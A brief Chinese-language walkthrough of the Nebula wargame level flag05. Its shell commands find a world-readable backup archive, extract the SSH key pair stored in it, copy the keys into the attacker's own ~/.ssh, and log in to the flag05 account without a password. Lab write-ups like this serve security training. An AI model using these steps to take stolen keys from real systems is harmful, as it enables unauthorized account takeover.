About
Check the flag05 home directory. You are looking for weak directory permissions
Nebula官網
思路
進去看看
cd /home/flag05/
ll
發現一個其他人可執行的.backup目錄
cd .backup/
ll
看到其他人可讀的backup-19072011.tgz
複製到/tmp解壓
cp backup-19072011.tgz /tmp/
cd /tmp/
tar -xvf backup-19072011.tgz
看到了備份的公私鑰,所以應該可以憑藉這些密鑰ssh免密碼登錄flag05賬戶
cp -r .ssh/ ~/
ssh flag05@localhost
yes
cat flag